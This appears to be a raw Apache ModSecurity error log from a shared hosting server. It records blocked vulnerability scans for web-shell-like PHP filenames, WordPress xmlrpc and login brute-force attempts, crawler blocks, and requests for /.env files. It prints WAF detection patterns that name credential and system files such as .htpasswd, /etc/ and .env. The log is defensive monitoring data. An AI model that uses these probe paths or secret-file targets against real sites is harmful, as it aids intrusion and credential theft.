[Tue May 26 16:42:31.025244 2026] [security2:error] [pid 823496:tid 823685] [client 20.195.199.65:29830] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/wp-temp.php"] [unique_id "ahWAH5a08mrtyBNpA4PHJAAAADk"]
[Tue May 26 16:42:31.527031 2026] [autoindex:error] [pid 823496:tid 823686] [client 20.195.199.65:34737] AH01276: Cannot serve directory /home1/cicode9a/public_html/dev/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:42:31.527853 2026] [security2:error] [pid 823496:tid 823686] [client 20.195.199.65:34737] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "dev.cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahWAH5a08mrtyBNpA4PHLAAAADo"]
[Tue May 26 16:42:31.703552 2026] [security2:error] [pid 823496:tid 823752] [client 20.195.199.65:34737] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/xmu.php"] [unique_id "ahWAH5a08mrtyBNpA4PHMwAAAHw"]
[Tue May 26 16:42:31.703668 2026] [security2:error] [pid 823496:tid 823752] [client 20.195.199.65:34737] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/xmu.php"] [unique_id "ahWAH5a08mrtyBNpA4PHMwAAAHw"]
[Tue May 26 16:42:31.861270 2026] [security2:error] [pid 823496:tid 823737] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAHZa08mrtyBNpA4PHEAAAAG0"]
[Tue May 26 16:42:32.304972 2026] [security2:error] [pid 817651:tid 817784] [client 20.195.199.65:29868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/mode.php"] [unique_id "ahWAINlGRCPPN1dS2y2syAAAAIg"]
[Tue May 26 16:42:32.305061 2026] [security2:error] [pid 817651:tid 817784] [client 20.195.199.65:29868] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/mode.php"] [unique_id "ahWAINlGRCPPN1dS2y2syAAAAIg"]
[Tue May 26 16:42:32.799914 2026] [proxy:error] [pid 823496:tid 823729] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:42:32.799955 2026] [proxy_http:error] [pid 823496:tid 823729] [client 143.198.11.103:51170] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://cpcontacts.d2cargo.com/
[Tue May 26 16:42:32.800326 2026] [security2:error] [pid 817651:tid 817884] [client 20.163.32.78:35072] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "208.91.198.85"] [uri "/cgi-sys/404.html"] [unique_id "ahWAINlGRCPPN1dS2y2s0AAAAOw"], referer: https://208.91.198.85/
[Tue May 26 16:42:32.800553 2026] [proxy:error] [pid 823496:tid 823729] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:42:32.800601 2026] [proxy_http:error] [pid 823496:tid 823729] [client 143.198.11.103:51170] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://cpcontacts.d2cargo.com/
[Tue May 26 16:42:33.576090 2026] [security2:error] [pid 823496:tid 823704] [client 20.195.199.65:22726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp-admin/js/index.php"] [unique_id "ahWAIZa08mrtyBNpA4PHTwAAAEw"]
[Tue May 26 16:42:33.576204 2026] [security2:error] [pid 823496:tid 823704] [client 20.195.199.65:22726] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/wp-admin/js/index.php"] [unique_id "ahWAIZa08mrtyBNpA4PHTwAAAEw"]
[Tue May 26 16:42:33.841701 2026] [security2:error] [pid 817651:tid 817892] [client 117.198.37.168:55572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAIdlGRCPPN1dS2y2s5AAAAPQ"]
[Tue May 26 16:42:33.841857 2026] [security2:error] [pid 817651:tid 817892] [client 117.198.37.168:55572] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAIdlGRCPPN1dS2y2s5AAAAPQ"]
[Tue May 26 16:42:34.061319 2026] [security2:error] [pid 817651:tid 817857] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAH9lGRCPPN1dS2y2sxgAAANE"]
[Tue May 26 16:42:34.172067 2026] [security2:error] [pid 823496:tid 823746] [client 20.195.199.65:34719] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/dx.php"] [unique_id "ahWAIpa08mrtyBNpA4PHXgAAAHY"]
[Tue May 26 16:42:34.172180 2026] [security2:error] [pid 823496:tid 823746] [client 20.195.199.65:34719] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/dx.php"] [unique_id "ahWAIpa08mrtyBNpA4PHXgAAAHY"]
[Tue May 26 16:42:35.057340 2026] [security2:error] [pid 823496:tid 823718] [client 20.195.199.65:63443] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/puc.php"] [unique_id "ahWAI5a08mrtyBNpA4PHdwAAAFo"]
[Tue May 26 16:42:35.057453 2026] [security2:error] [pid 823496:tid 823718] [client 20.195.199.65:63443] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/puc.php"] [unique_id "ahWAI5a08mrtyBNpA4PHdwAAAFo"]
[Tue May 26 16:42:36.047728 2026] [security2:error] [pid 817651:tid 817787] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAIdlGRCPPN1dS2y2s6QAAAIs"]
[Tue May 26 16:42:36.271072 2026] [security2:error] [pid 817651:tid 817814] [client 20.195.199.65:18580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/themes.php"] [unique_id "ahWAJNlGRCPPN1dS2y2s-wAAAKY"]
[Tue May 26 16:42:36.271215 2026] [security2:error] [pid 817651:tid 817814] [client 20.195.199.65:18580] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/themes.php"] [unique_id "ahWAJNlGRCPPN1dS2y2s-wAAAKY"]
[Tue May 26 16:42:37.537152 2026] [security2:error] [pid 817651:tid 817826] [client 114.119.155.83:45211] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahWAJdlGRCPPN1dS2y2tCgAAALI"], referer: http://glorodavionics.com/beta/index.php?route=product/category&path=72_25_103
[Tue May 26 16:42:37.682565 2026] [security2:error] [pid 823496:tid 823633] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAI5a08mrtyBNpA4PHfgAAAAU"]
[Tue May 26 16:42:37.864547 2026] [security2:error] [pid 823496:tid 823659] [client 20.195.199.65:16425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/dx.php"] [unique_id "ahWAJZa08mrtyBNpA4PHrgAAAB8"]
[Tue May 26 16:42:37.864670 2026] [security2:error] [pid 823496:tid 823659] [client 20.195.199.65:16425] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/dx.php"] [unique_id "ahWAJZa08mrtyBNpA4PHrgAAAB8"]
[Tue May 26 16:42:38.483333 2026] [security2:error] [pid 823496:tid 823688] [client 20.195.199.65:42693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/11.php"] [unique_id "ahWAJpa08mrtyBNpA4PHtgAAADw"]
[Tue May 26 16:42:38.483467 2026] [security2:error] [pid 823496:tid 823688] [client 20.195.199.65:42693] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/11.php"] [unique_id "ahWAJpa08mrtyBNpA4PHtgAAADw"]
[Tue May 26 16:42:39.594872 2026] [security2:error] [pid 823496:tid 823673] [client 20.195.199.65:22746] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/p.php"] [unique_id "ahWAJ5a08mrtyBNpA4PHyQAAAC0"]
[Tue May 26 16:42:39.594992 2026] [security2:error] [pid 823496:tid 823673] [client 20.195.199.65:22746] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/p.php"] [unique_id "ahWAJ5a08mrtyBNpA4PHyQAAAC0"]
[Tue May 26 16:42:40.122778 2026] [security2:error] [pid 823496:tid 823747] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAJZa08mrtyBNpA4PHsQAAAHc"]
[Tue May 26 16:42:41.565892 2026] [autoindex:error] [pid 823496:tid 823639] [client 20.195.199.65:25661] AH01276: Cannot serve directory /home1/cicode9a/public_html/dev/wp-includes/Requests/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:42:41.566640 2026] [security2:error] [pid 823496:tid 823639] [client 20.195.199.65:25661] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "dev.cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahWAKZa08mrtyBNpA4PH7QAAAAs"]
[Tue May 26 16:42:41.768484 2026] [security2:error] [pid 823496:tid 823710] [client 20.195.199.65:25661] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/bthil.php"] [unique_id "ahWAKZa08mrtyBNpA4PH8AAAAFI"]
[Tue May 26 16:42:41.768643 2026] [security2:error] [pid 823496:tid 823710] [client 20.195.199.65:25661] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/bthil.php"] [unique_id "ahWAKZa08mrtyBNpA4PH8AAAAFI"]
[Tue May 26 16:42:42.306945 2026] [security2:error] [pid 823496:tid 823721] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAKJa08mrtyBNpA4PH1QAAAF0"]
[Tue May 26 16:42:43.485870 2026] [security2:error] [pid 823496:tid 823695] [client 20.195.199.65:25634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/7.php"] [unique_id "ahWAK5a08mrtyBNpA4PIBAAAAEM"]
[Tue May 26 16:42:43.485998 2026] [security2:error] [pid 823496:tid 823695] [client 20.195.199.65:25634] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/7.php"] [unique_id "ahWAK5a08mrtyBNpA4PIBAAAAEM"]
[Tue May 26 16:42:43.597013 2026] [security2:error] [pid 823496:tid 823674] [client 62.60.130.233:60208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/wp-login.php"] [unique_id "ahWAK5a08mrtyBNpA4PIAwAAAC4"]
[Tue May 26 16:42:44.128838 2026] [security2:error] [pid 823496:tid 823735] [client 117.198.37.168:55888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWALJa08mrtyBNpA4PIIAAAAGs"]
[Tue May 26 16:42:44.128948 2026] [security2:error] [pid 823496:tid 823735] [client 117.198.37.168:55888] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWALJa08mrtyBNpA4PIIAAAAGs"]
[Tue May 26 16:42:44.467844 2026] [security2:error] [pid 823496:tid 823649] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAKpa08mrtyBNpA4PH9AAAABU"]
[Tue May 26 16:42:44.814827 2026] [security2:error] [pid 823496:tid 823692] [client 62.60.130.233:55077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/wp-login.php"] [unique_id "ahWALJa08mrtyBNpA4PILQAAAEA"]
[Tue May 26 16:42:45.678548 2026] [security2:error] [pid 817651:tid 817865] [client 20.195.199.65:16446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/8.php"] [unique_id "ahWALdlGRCPPN1dS2y2tQQAAANk"]
[Tue May 26 16:42:45.678744 2026] [security2:error] [pid 817651:tid 817865] [client 20.195.199.65:16446] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/8.php"] [unique_id "ahWALdlGRCPPN1dS2y2tQQAAANk"]
[Tue May 26 16:42:46.256107 2026] [security2:error] [pid 823496:tid 823715] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAK5a08mrtyBNpA4PIEQAAAFc"]
[Tue May 26 16:42:47.569557 2026] [security2:error] [pid 817651:tid 817818] [client 185.191.171.12:38260] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/12/"] [unique_id "ahWAL9lGRCPPN1dS2y2tWwAAAKo"]
[Tue May 26 16:42:47.569713 2026] [security2:error] [pid 817651:tid 817818] [client 185.191.171.12:38260] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/12/"] [unique_id "ahWAL9lGRCPPN1dS2y2tWwAAAKo"]
[Tue May 26 16:42:47.606278 2026] [security2:error] [pid 823496:tid 823656] [client 20.195.199.65:13980] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "dev.cicodev.org"] [uri "/1.php"] [unique_id "ahWAL5a08mrtyBNpA4PIWAAAABw"]
[Tue May 26 16:42:47.606386 2026] [security2:error] [pid 823496:tid 823656] [client 20.195.199.65:13980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/1.php"] [unique_id "ahWAL5a08mrtyBNpA4PIWAAAABw"]
[Tue May 26 16:42:47.606461 2026] [security2:error] [pid 823496:tid 823656] [client 20.195.199.65:13980] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/1.php"] [unique_id "ahWAL5a08mrtyBNpA4PIWAAAABw"]
[Tue May 26 16:42:48.325581 2026] [security2:error] [pid 823496:tid 823753] [client 20.195.199.65:34729] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/100.php"] [unique_id "ahWAMJa08mrtyBNpA4PIYwAAAH0"]
[Tue May 26 16:42:48.325694 2026] [security2:error] [pid 823496:tid 823753] [client 20.195.199.65:34729] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/100.php"] [unique_id "ahWAMJa08mrtyBNpA4PIYwAAAH0"]
[Tue May 26 16:42:48.364414 2026] [security2:error] [pid 823496:tid 823653] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWALZa08mrtyBNpA4PIPwAAABk"]
[Tue May 26 16:42:48.929667 2026] [security2:error] [pid 823496:tid 823737] [client 20.195.199.65:34738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/about.php"] [unique_id "ahWAMJa08mrtyBNpA4PIcQAAAG0"]
[Tue May 26 16:42:48.929777 2026] [security2:error] [pid 823496:tid 823737] [client 20.195.199.65:34738] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/about.php"] [unique_id "ahWAMJa08mrtyBNpA4PIcQAAAG0"]
[Tue May 26 16:42:49.548990 2026] [security2:error] [pid 823496:tid 823637] [client 20.195.199.65:26787] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/admin.php"] [unique_id "ahWAMZa08mrtyBNpA4PIfwAAAAk"]
[Tue May 26 16:42:49.549107 2026] [security2:error] [pid 823496:tid 823637] [client 20.195.199.65:26787] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/admin.php"] [unique_id "ahWAMZa08mrtyBNpA4PIfwAAAAk"]
[Tue May 26 16:42:49.690837 2026] [security2:error] [pid 817651:tid 817903] [client 176.65.139.238:28838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "landsonlogistics.com.onesoft.in"] [uri "/.env"] [unique_id "ahWAMdlGRCPPN1dS2y2tZQAAAP8"]
[Tue May 26 16:42:49.707835 2026] [security2:error] [pid 823496:tid 823651] [client 176.65.139.231:28054] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "singhcouriercargo.com.onesoft.in"] [uri "/.env"] [unique_id "ahWAMZa08mrtyBNpA4PIhgAAABc"]
[Tue May 26 16:42:49.811525 2026] [security2:error] [pid 823496:tid 823708] [client 176.65.139.234:47820] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/.env"] [unique_id "ahWAMZa08mrtyBNpA4PIhwAAAFA"]
